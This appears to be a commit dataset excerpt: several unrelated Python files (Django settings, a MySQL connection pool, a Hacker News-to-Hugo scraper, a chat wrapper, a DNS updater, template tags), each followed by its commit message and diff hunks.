"django.contrib.messages.context_processors.messages",
"mygpo.web.googleanalytics.processor",
)
AUTH_PROFILE_MODULE = "api.UserProfile"
LOGIN_URL = '/login/'
CSRF_FAILURE_VIEW='mygpo.web.views.security.csrf_failure'
# The following entries should be set in settings_prod.py
DEFAULT_FROM_EMAIL = ''
SECRET_KEY = ''
GOOGLE_ANALYTICS_PROPERTY_ID=''
DIRECTORY_EXCLUDED_TAGS = ()
FLICKR_API_KEY = ''
MAINTENANCE = os.path.exists(os.path.join(BASE_DIR, 'MAINTENANCE'))
EMAIL_BACKEND = 'django_couchdb_utils.email.CouchDBEmailBackend'
try:
from settings_prod import *
except ImportError, e:
import sys
print >> sys.stderr, 'create settings_prod.py with your customized settings'
|
Python
| 0
|
@@ -4575,16 +4575,25 @@
s.email.
+backends.
CouchDBE
|
bc1e350dd19d91932bbfff73f863129ac94273c9
|
bump version to 2.0.1
|
torment/information.py
|
torment/information.py
|
# Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.0'
|
Python
| 0
|
@@ -809,11 +809,11 @@
= '2.0.
-0
+1
'%0A
|
085d6cd31e8dce17a4d5c98085a03d8adf896bda
|
Fix transaction.execute args to kwargs
|
tornado_mysql/pools.py
|
tornado_mysql/pools.py
|
"""Connection pool"""
from __future__ import absolute_import, division, print_function
from collections import deque
import warnings
from tornado.ioloop import IOLoop
from tornado.gen import coroutine, Return
from tornado.concurrent import Future
from tornado_mysql import connect
from tornado_mysql.connections import Connection
DEBUG = False
def _debug(*msg):
if DEBUG:
print(*msg)
class Pool(object):
"""Connection pool like Golang's database/sql.DB.
This connection pool is based on autocommit mode.
You can execute query without knowing connection.
When transaction is necessary, you can checkout transaction object.
"""
def __init__(self,
connect_kwargs,
max_idle_connections=1,
max_recycle_sec=3600,
max_open_connections=0,
io_loop=None,
):
"""
:param dict connect_kwargs: kwargs for tornado_mysql.connect()
:param int max_idle_connections: Max number of keeping connections.
:param int max_recycle_sec: How long connections are recycled.
:param int max_open_connections:
Max number of opened connections. 0 means no limit.
"""
connect_kwargs['autocommit'] = True
self.io_loop = io_loop or IOLoop.current()
self.connect_kwargs = connect_kwargs
self.max_idle = max_idle_connections
self.max_open = max_open_connections
self.max_recycle_sec = max_recycle_sec
self._opened_conns = 0
self._free_conn = deque()
self._waitings = deque()
def stat(self):
"""Returns (opened connections, free connections, waiters)"""
return (self._opened_conns, len(self._free_conn), len(self._waitings))
def _get_conn(self):
now = self.io_loop.time()
# Try to reuse in free pool
while self._free_conn:
conn = self._free_conn.popleft()
if now - conn.connected_time > self.max_recycle_sec:
self._close_async(conn)
continue
_debug("Reusing connection from pool:", self.stat())
fut = Future()
fut.set_result(conn)
return fut
# Open new connection
if self.max_open == 0 or self._opened_conns < self.max_open:
self._opened_conns += 1
_debug("Creating new connection:", self.stat())
return connect(**self.connect_kwargs)
# Wait to other connection is released.
fut = Future()
self._waitings.append(fut)
return fut
def _put_conn(self, conn):
if (len(self._free_conn) < self.max_idle and
self.io_loop.time() - conn.connected_time < self.max_recycle_sec):
if self._waitings:
fut = self._waitings.popleft()
fut.set_result(conn)
_debug("Passing returned connection to waiter:", self.stat())
else:
self._free_conn.append(conn)
_debug("Add conn to free pool:", self.stat())
else:
self._close_async(conn)
def _close_async(self, conn):
self.io_loop.add_future(conn.close_async(), callback=self._after_close)
def _close_conn(self, conn):
conn.close()
self._after_close()
def _after_close(self, fut=None):
if self._waitings:
fut = self._waitings.popleft()
conn = Connection(**self.connect_kwargs)
cf = conn.connect()
self.io_loop.add_future(cf, callback=lambda f: fut.set_result(conn))
else:
self._opened_conns -= 1
_debug("Connection closed:", self.stat())
@coroutine
def execute(self, query, params=None):
"""Execute query in pool.
Returns future yielding closed cursor.
You can get rows, lastrowid, etc from the cursor.
:return: Future of cursor
:rtype: Future
"""
conn = yield self._get_conn()
try:
cur = conn.cursor()
yield cur.execute(query, params)
yield cur.close()
except:
self._close_conn(conn)
raise
else:
self._put_conn(conn)
raise Return(cur)
@coroutine
def begin(self):
"""Start transaction
Wait to get connection and returns `Transaction` object.
:return: Future[Transaction]
:rtype: Future
"""
conn = yield self._get_conn()
try:
yield conn.begin()
except:
self._close_conn(conn)
raise
trx = Transaction(self, conn)
raise Return(trx)
class Transaction(object):
"""Represents transaction in pool"""
def __init__(self, pool, conn):
self._pool = pool
self._conn = conn
def _ensure_conn(self):
if self._conn is None:
raise Exception("Transaction is closed already")
def _close(self):
self._pool._put_conn(self._conn)
self._pool = self._conn = None
@coroutine
def execute(self, query, args):
"""
:return: Future[Cursor]
:rtype: Future
"""
self._ensure_conn()
cur = self._conn.cursor()
yield cur.execute(query, args)
raise Return(cur)
@coroutine
def commit(self):
self._ensure_conn()
yield self._conn.commit()
self._close()
@coroutine
def rollback(self):
self._ensure_conn()
yield self._conn.rollback()
self._close()
def __del__(self):
if self._pool is not None:
warnings.warn("Transaction has not committed or rollbacked.")
self._pool._close_conn(self._conn)
|
Python
| 0
|
@@ -5136,16 +5136,21 @@
ry, args
+=None
):%0A
|
ef98508d878a724cccda3a9c81666759966bb879
|
fix mkdir
|
publish.py
|
publish.py
|
# #!/usr/bin/env python3
import json
import os
import functools
import concurrent.futures
from datetime import datetime
import re
from pathlib import Path
import time
import yaml
import asyncio
import logging
import aiohttp
import aiofiles
import subprocess
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
TEMPLATE = """\
---
{front_matter}
---
{content}
"""
def timing(f):
"""
decorator to time a function and print it
:param f: function to wrap
:return: wrapped function
"""
def wrap():
start = time.time()
f()
end = time.time()
logger.info(f"{f.__name__} took {end - start!r}")
return wrap
def slugify(name):
"""
Takes a article name and returns a slug appropriate version using hyphens
:param name: string to be converted
:return: converted string
"""
out = re.sub(r'[^\w\d\s]', '', name)
return re.sub(r'\s', '-', out)
async def write_file(data):
if data:
data_type = data.get('type', '')
if data_type == 'comment':
file_name = Path(f'./data/post/{data["id"]}.yaml')
data_out = yaml.dump(data)
else:
data_title = data.get('title', '')
# set 'Ask HN:' or 'Show HN:' set type to ask or show
match = re.match(r"^([A-Za-z]+)\s*HN\:.*$", data_title)
if match:
data_type = match.group(1).lower()
data['date'] = datetime.fromtimestamp(data.get('time')).isoformat()
data['linkurl'] = data.get('url')
data['slug'] = slugify(data_title)
data['tags'] = []
data['categories'] = [data_type] if data_type else []
for x in ('time', 'url', 'type'):
if x in data:
del data[x]
file_name = Path(f'./content/en/post/{data["slug"]}.md')
data_out = TEMPLATE.format(front_matter=yaml.dump(data).strip(), content="")
# lets write the file if it doesn't exist
if file_name and not file_name.exists():
async with aiofiles.open(file_name, 'w') as f:
await f.write(data_out)
async def fetch(url, session, sem):
async with sem:
async with session.get(url, ssl=False) as response:
return await response.json()
async def worker(queue, session, sem):
while True:
json_data = None
# Get a "work item" out of the queue.
url = await queue.get()
# download the json, wait for at most 5 seconds
try:
json_data = await asyncio.wait_for(fetch(url, session, sem), timeout=5)
except asyncio.TimeoutError:
logger.info(f"Timeout for {url}")
# add back to queue for retry?
# await queue.put(queue_item)
# This data may add more to the queue lets check
if type(json_data) is list:
# list of ids e.g [123, 456]
ids = json_data
elif type(json_data) is dict:
# an individual record lets add child records to the queue
ids = json_data.get('kids', [])
# lets write this record to file async
await write_file(json_data)
else:
ids = []
for item_id in ids:
queue.put_nowait(f'https://hacker-news.firebaseio.com/v0/item/{item_id}.json')
# Notify the queue that the "work item" has been processed.
queue.task_done()
async def start(num_workers):
# Create a queue that we will use to store our "workload".
queue = asyncio.Queue()
# add initial urls to queue
for url in [f'https://hacker-news.firebaseio.com/v0/{name}.json' for name in
('topstories', 'askstories', 'showstories', 'jobstories')]:
queue.put_nowait(url)
tasks = []
conn = aiohttp.TCPConnector(ttl_dns_cache=300, limit=0)
sem = asyncio.Semaphore(100)
async with aiohttp.ClientSession(connector=conn) as session:
# Create worker tasks to process the queue concurrently.
for i in range(num_workers):
task = asyncio.create_task(worker(queue, session, sem))
tasks.append(task)
# Wait until the queue is fully processed.
await queue.join()
# Cancel our worker tasks.
for task in tasks:
task.cancel()
@timing
def main():
logger.info("Starting publish...")
num_workers = int(os.environ.get('num_workers', 100))
# create dirs
Path('./content/en/post/').mkdir(exist_ok=True)
Path('./data/post/').mkdir(exist_ok=True)
# Download all json and create files
asyncio.run(start(num_workers))
# asyncio.get_event_loop().run_until_complete(start(num_workers))
logger.info("Building site...")
subprocess.run(["hugo", "--verbose"])
if __name__ == '__main__':
main()
|
Python
| 0.000014
|
@@ -4535,32 +4535,46 @@
n/post/').mkdir(
+parents=True,
exist_ok=True)%0A
@@ -4603,16 +4603,30 @@
).mkdir(
+parents=True,
exist_ok
|
90ad8e104c339b923d9291916647391572fbced1
|
Bump version number
|
nassl/__init__.py
|
nassl/__init__.py
|
# -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.15.1'
|
Python
| 0.000002
|
@@ -69,10 +69,10 @@
'0.1
-5.1
+6.0
'%0A%0A
|
d60c61753d2d8d2384e678c7ad2050c32562c3cf
|
Fix potential problem with cli
|
pygreen.py
|
pygreen.py
|
#! /usr/bin/python
# PyGreen
# Copyright (c) 2013, Nicolas Vanhoren
#
# Released under the MIT license
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import bottle
import os.path
from mako.lookup import TemplateLookup
import os
import os.path
import wsgiref.handlers
import sys
import logging
import re
import argparse
import sys
import markdown
_logger = logging.getLogger(__name__)
class PyGreen:
def __init__(self):
# the Bottle application
self.app = bottle.Bottle()
# a set of strings that identifies the extension of the files
# that should be processed using Mako
self.template_exts = set(["html"])
# the folder where the files to serve are located. Do not set
# directly, use set_folder instead
self.folder = "."
# the TemplateLookup of Mako
self.templates = TemplateLookup(directories=[self.folder],
imports=["from markdown import markdown"],
input_encoding='iso-8859-1',
)
# A list of regular expression. Files whose the name match
# one of those regular expressions will not be outputed when generating
# a static version of the web site
self.file_exclusion = [r".*\.mako", r"(^|.*\/)\..*"]
def base_lister():
files = []
for dirpath, dirnames, filenames in os.walk(self.folder):
for f in filenames:
absp = os.path.join(dirpath, f)
path = os.path.relpath(absp, self.folder)
good = True
for ex in self.file_exclusion:
if re.match(ex, path):
good = False
continue
if good:
files.append(path)
return files
# A list of function. Each function must return a list of paths
# of files to export during the generation of the static web site.
# The default one simply returns all the files contained in the folder.
# It is necessary to define new listers when new routes are defined
# in the Bottle application, or the static site generation routine
# will not be able to detect the files to export.
self.file_listers = [base_lister]
@self.app.route('/', method=['GET', 'POST', 'PUT', 'DELETE'])
@self.app.route('/<path:path>', method=['GET', 'POST', 'PUT', 'DELETE'])
def hello(path="index.html"):
if path.split(".")[-1] in self.template_exts:
t = self.templates.get_template(path)
data = t.render_unicode(pygreen=pygreen)
return data.encode(t.module._source_encoding)
return bottle.static_file(path, root=self.folder)
def set_folder(self, folder):
"""
Sets the folder where the files to serve are located.
"""
self.folder = folder
self.templates.directories[0] = folder
def run(self, **kwargs):
"""
Launch a development web server.
"""
kwargs.setdefault("host", "0.0.0.0")
bottle.run(self.app, **kwargs)
def get(self, path):
"""
Get the content of a file, indentified by its path relative to the folder configured
in PyGreen. If the file extension is one of the extensions that should be processed
through Mako, it will be processed.
"""
handler = wsgiref.handlers.SimpleHandler(sys.stdin, sys.stdout, sys.stderr, {})
handler.setup_environ()
env = handler.environ
env.update({'PATH_INFO': "/%s" % path, 'REQUEST_METHOD': "GET"})
out = b"".join(pygreen.app(env, lambda *args: None))
return out
def gen_static(self, output_folder):
"""
Generates a complete static version of the web site. It will stored in
output_folder.
"""
files = []
for l in self.file_listers:
files += l()
for f in files:
_logger.info("generating %s" % f)
content = self.get(f)
loc = os.path.join(output_folder, f)
d = os.path.dirname(loc)
if not os.path.exists(d):
os.makedirs(d)
with open(loc, "wb") as file_:
file_.write(content)
def cli(self, cmd_args=None):
"""
The command line interface of PyGreen.
"""
logging.basicConfig(level=logging.INFO, format='%(message)s')
parser = argparse.ArgumentParser(description='PyGreen, micro web framework/static web site generator')
subparsers = parser.add_subparsers(dest='action')
parser_serve = subparsers.add_parser('serve', help='serve the web site')
parser_serve.add_argument('-p', '--port', type=int, default=8080, help='folder containg files to serve')
parser_serve.add_argument('-f', '--folder', default=".", help='folder containg files to serve')
parser_serve.add_argument('-d', '--disable-templates', action='store_true', default=False, help='just serve static files, do not use invoke Mako')
def serve():
if args.disable_templates:
pygreen.template_exts = set([])
pygreen.run(port=args.port)
parser_serve.set_defaults(func=serve)
parser_gen = subparsers.add_parser('gen', help='generate a static version of the site')
parser_gen.add_argument('output', help='folder to store the files')
parser_gen.add_argument('-f', '--folder', default=".", help='folder containg files to serve')
def gen():
pygreen.gen_static(args.output)
parser_gen.set_defaults(func=gen)
args = parser.parse_args(cmd_args)
pygreen.set_folder(args.folder)
args.func()
pygreen = PyGreen()
if __name__ == "__main__":
pygreen.cli()
|
Python
| 0.011905
|
@@ -6263,23 +6263,20 @@
-pygreen
+self
.templat
@@ -6304,23 +6304,20 @@
-pygreen
+self
.run(por
@@ -6681,23 +6681,20 @@
-pygreen
+self
.gen_sta
@@ -6804,23 +6804,20 @@
-pygreen
+self
.set_fol
|
53b156f83a792de1ebe42e93bb14f8dec005eada
|
Remove unused erroneous `import enum`.
|
chatexchange/wrapper.py
|
chatexchange/wrapper.py
|
import re
import time
import Queue
import threading
import logging
import logging.handlers
import BeautifulSoup
import enum
from . import browser, events
TOO_FAST_RE = r"You can perform this action again in (\d+) seconds"
logger = logging.getLogger(__name__)
class SEChatWrapper(object):
def __init__(self, site="SE"):
self.logger = logger.getChild('SEChatWraper')
if site == 'MSO':
self.logger.warn("'MSO' should no longer be used, use 'MSE' instead.")
site = 'MSE'
self.br = browser.SEChatBrowser()
self.site = site
self._previous = None
self.message_queue = Queue.Queue()
self.logged_in = False
self.messages = 0
self.thread = threading.Thread(target=self._worker, name="message_sender")
self.thread.setDaemon(True)
def login(self, username, password):
assert not self.logged_in
self.logger.info("Logging in.")
self.br.loginSEOpenID(username, password)
if self.site == "SE":
self.br.loginSECOM()
self.br.loginChatSE()
elif self.site == "SO":
self.br.loginSO()
elif self.site == "MSE":
self.br.loginMSE()
else:
raise ValueError("Unable to login to site: %r" % (self.site,))
self.logged_in = True
self.logger.info("Logged in.")
self.thread.start()
def logout(self):
assert self.logged_in
self.message_queue.put(SystemExit)
self.logger.info("Logged out.")
self.logged_in = False
def sendMessage(self, room_id, text):
self.message_queue.put((room_id, text))
self.logger.info("Queued message %r for room_id #%r.", text, room_id)
self.logger.info("Queue length: %d.", self.message_queue.qsize())
def __del__(self):
if self.logged_in:
self.message_queue.put(SystemExit)
# todo: underscore everything used by
# the thread so this is guaranteed
# to work.
assert False, "You forgot to log out."
def _worker(self):
assert self.logged_in
self.logger.info("Worker thread reporting for duty.")
while True:
next = self.message_queue.get() # blocking
if next == SystemExit:
self.logger.info("Worker thread exits.")
return
else:
self.messages += 1
room_id, text = next
self.logger.info(
"Now serving customer %d, %r for room #%s.",
self.messages, text, room_id)
self._actuallySendMessage(room_id, text) # also blocking.
self.message_queue.task_done()
# Appeasing the rate limiter gods is hard.
BACKOFF_MULTIPLIER = 2
BACKOFF_ADDER = 5
# When told to wait n seconds, wait n * BACKOFF_MULTIPLIER + BACKOFF_ADDER
def _actuallySendMessage(self, room_id, text):
room_id = str(room_id)
sent = False
attempt = 0
if text == self._previous:
text = " " + text
while not sent:
wait = 0
attempt += 1
self.logger.debug("Attempt %d: start.", attempt)
response = self.br.postSomething(
"/chats/"+room_id+"/messages/new",
{"text": text})
if isinstance(response, str):
match = re.match(TOO_FAST_RE, response)
if match: # Whoops, too fast.
wait = int(match.group(1))
self.logger.debug(
"Attempt %d: denied: throttled, must wait %.1f seconds",
attempt, wait)
# Wait more than that, though.
wait *= self.BACKOFF_MULTIPLIER
wait += self.BACKOFF_ADDER
else: # Something went wrong. I guess that happens.
wait = self.BACKOFF_ADDER
logging.error(
"Attempt %d: denied: unknown reason %r",
attempt, response)
elif isinstance(response, dict):
if response["id"] is None: # Duplicate message?
text = text + " " # Append because markdown
wait = self.BACKOFF_ADDER
self.logger.debug(
"Attempt %d: denied: duplicate, waiting %.1f seconds.",
attempt, wait)
if wait:
self.logger.debug("Attempt %d: waiting %.1f seconds", attempt, wait)
else:
wait = self.BACKOFF_ADDER
self.logger.debug("Attempt %d: success. Waiting %.1f seconds", attempt, wait)
sent = True
self._previous = text
time.sleep(wait)
def joinRoom(self, room_id):
self.br.joinRoom(room_id)
def _room_events(self, activity, room_id):
"""
Returns a list of Events associated with a particular room,
given an activity message from the server.
"""
room_activity = activity.get('r' + room_id, {})
room_events_data = room_activity.get('e', [])
room_events = [
events.make(data, self) for data in room_events_data if data]
return room_events
def watchRoom(self, room_id, on_event, interval):
def on_activity(activity):
for event in self._room_events(activity, room_id):
on_event(event, self)
self.br.watch_room_http(room_id, on_activity, interval)
def watchRoomSocket(self, room_id, on_event):
def on_activity(activity):
for event in self._room_events(activity, room_id):
on_event(event, self)
self.br.watch_room_socket(room_id, on_activity)
|
Python
| 0
|
@@ -109,20 +109,8 @@
Soup
-%0Aimport enum
%0A%0Afr
|
e51786c46ad4eb7310b1eaa0153253116f2c01bc
|
Update test bids
|
openprocurement/tender/esco/tests/base.py
|
openprocurement/tender/esco/tests/base.py
|
# -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.tender.openeu.tests.base import (
BaseTenderWebTest,
test_features_tender_data as base_eu_test_features_data,
test_tender_data as base_eu_test_data,
test_lots as base_eu_lots,
test_bids as base_eu_bids,
)
test_tender_data = deepcopy(base_eu_test_data)
test_tender_data['procurementMethodType'] = "esco.EU"
test_tender_data['NBUdiscountRate'] = 0.22
test_tender_data['minValue'] = test_tender_data['value']
del test_tender_data['value']
test_features_tender_data = deepcopy(base_eu_test_features_data)
test_features_tender_data['procurementMethodType'] = "esco.EU"
test_features_tender_data['NBUdiscountRate'] = 0.22
test_features_tender_data['minValue'] = test_features_tender_data['value']
del test_features_tender_data['value']
test_lots = deepcopy(base_eu_lots)
test_lots[0]['minValue'] = test_lots[0]['value']
del test_lots[0]['value']
test_bids = deepcopy(base_eu_bids)
test_bids[0]['value'] = {'yearlyPayments': 0.9,
'annualCostsReduction': 751.5,
'contractDuration': 10}
class BaseESCOWebTest(BaseTenderWebTest):
relative_to = os.path.dirname(__file__)
initial_data = None
initial_status = None
initial_bids = None
initial_lots = None
initial_auth = ('Basic', ('broker', ''))
docservice = False
class BaseESCOContentWebTest(BaseESCOWebTest):
""" ESCO Content Test """
initialize_initial_data = True
def setUp(self):
super(BaseESCOContentWebTest, self).setUp()
if self.initial_data and self.initialize_initial_data:
self.create_tender()
class BaseESCOEUContentWebTest(BaseESCOContentWebTest):
""" ESCO EU Content Test """
initial_data = test_tender_data
|
Python
| 0
|
@@ -981,20 +981,37 @@
ds)%0A
-test_bids%5B0%5D
+for bid in test_bids:%0A bid
%5B'va
@@ -1065,18 +1065,16 @@
-
'annualC
@@ -1096,18 +1096,16 @@
751.5,%0A
-
|
7a8e5d15d7d9681b8d5ddae4d72e64b5ca6cba13
|
remove disabled code
|
dyndnsc/updater/base.py
|
dyndnsc/updater/base.py
|
# -*- coding: utf-8 -*-
import logging
import requests
from ..common.subject import Subject
from ..common.events import IP_UPDATE_SUCCESS, IP_UPDATE_ERROR
log = logging.getLogger(__name__)
class UpdateProtocol(Subject):
"""the base class for all update protocols"""
_updateurl = None
theip = None
hostname = None # this holds the desired dns hostname
status = 0
nochgcount = 0
failcount = 0
def __init__(self):
self.updateurl = self._updateurl
super(UpdateProtocol, self).__init__()
observers = []
# TODO: auto detect all notifiers
# TODO: make this configurable?
if False:
from ..notifications import osxnotificationcenter
if osxnotificationcenter.is_available():
observers.append(osxnotificationcenter.create_notify_handler())
from ..notifications import growl
if growl.is_available():
observers.append(growl.create_notify_handler())
for observer in observers:
self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))
def updateUrl(self):
return self.updateurl
def success(self):
self.status = 0
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_SUCCESS, "Updated IP address of '%s' to %s" % (self.hostname, self.theip))
def abuse(self):
self.status = 1
self.failcount = 0
self.nochgcount = 0
self.notify_observers(IP_UPDATE_ERROR, "This client is considered to be abusive for hostname '%s'" % (self.hostname))
def nochg(self):
self.status = 0
self.failcount = 0
self.nochgcount += 1
def nohost(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Invalid/non-existant hostname: [%s]" % (self.hostname))
def failure(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "Service is failing")
def notfqdn(self):
self.status = 1
self.failcount += 1
self.notify_observers(IP_UPDATE_ERROR, "The provided hostname '%s' is not a valid hostname!" % (self.hostname))
def protocol(self):
params = {'myip': self.theip, 'hostname': self.hostname}
r = requests.get(self.updateUrl(), params=params, auth=(self.userid, self.password), timeout=60)
r.close()
log.debug("status %i, %s", r.status_code, r.text)
if r.status_code == 200:
if r.text.startswith("good "):
self.success()
return self.theip
elif r.text.startswith('nochg'):
self.nochg()
return self.theip
elif r.text == 'nohost':
self.nohost()
return 'nohost'
elif r.text == 'abuse':
self.abuse()
return 'abuse'
elif r.text == '911':
self.failure()
return '911'
elif r.text == 'notfqdn':
self.notfqdn()
return 'notfqdn'
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.text))
return r.text
else:
self.status = 1
self.notify_observers(IP_UPDATE_ERROR, "Problem updating IP address of '%s' to %s: %s" % (self.hostname, self.theip, r.status_code))
return 'invalid http status code: %s' % r.status_code
|
Python
| 0
|
@@ -538,594 +538,8 @@
()%0A%0A
- observers = %5B%5D%0A%0A # TODO: auto detect all notifiers%0A # TODO: make this configurable?%0A if False:%0A from ..notifications import osxnotificationcenter%0A if osxnotificationcenter.is_available():%0A observers.append(osxnotificationcenter.create_notify_handler())%0A from ..notifications import growl%0A if growl.is_available():%0A observers.append(growl.create_notify_handler())%0A%0A for observer in observers:%0A self.register_observer(observer, (IP_UPDATE_SUCCESS, IP_UPDATE_ERROR))%0A%0A
|
6c15caa37c3635fc1ca65a0d2989a271bc5723fe
|
Update amalgamation.py
|
nnvm/amalgamation/amalgamation.py
|
nnvm/amalgamation/amalgamation.py
|
import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
|
Python
| 0.000001
|
@@ -244,16 +244,50 @@
'omp.h'
+, 'execinfo.h', 'packet/sse-inl.h'
%0A %5D%0A%0A
|
7fabbbb6562f068690b7971c6ea1299172400d73
|
fix `make run_importer_jobs`
|
labonneboite/importer/conf/development.py
|
labonneboite/importer/conf/development.py
|
# --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 5000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
|
Python
| 0
|
@@ -190,17 +190,18 @@
E_MAX =
-5
+20
000%0AMAXI
|
51129edea0a10a5799f329443b196e930a591fb9
|
Move down timezone module.
|
laundryapp/templatetags/laundryapptags.py
|
laundryapp/templatetags/laundryapptags.py
|
from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
user = context['request'].user
addable = CHECK_EVENT_PERM_FUNC(None, user)
if 'calendar' in context:
addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
context['addable'] = addable
day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
# get slots to display on the left
slots = _cook_slots(day_part, increment)
context['slots'] = slots
return context
def _cook_slots(period, increment):
"""
Prepare slots to be displayed on the left hand side
calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
|
Python
| 0
|
@@ -256,42 +256,8 @@
rse%0A
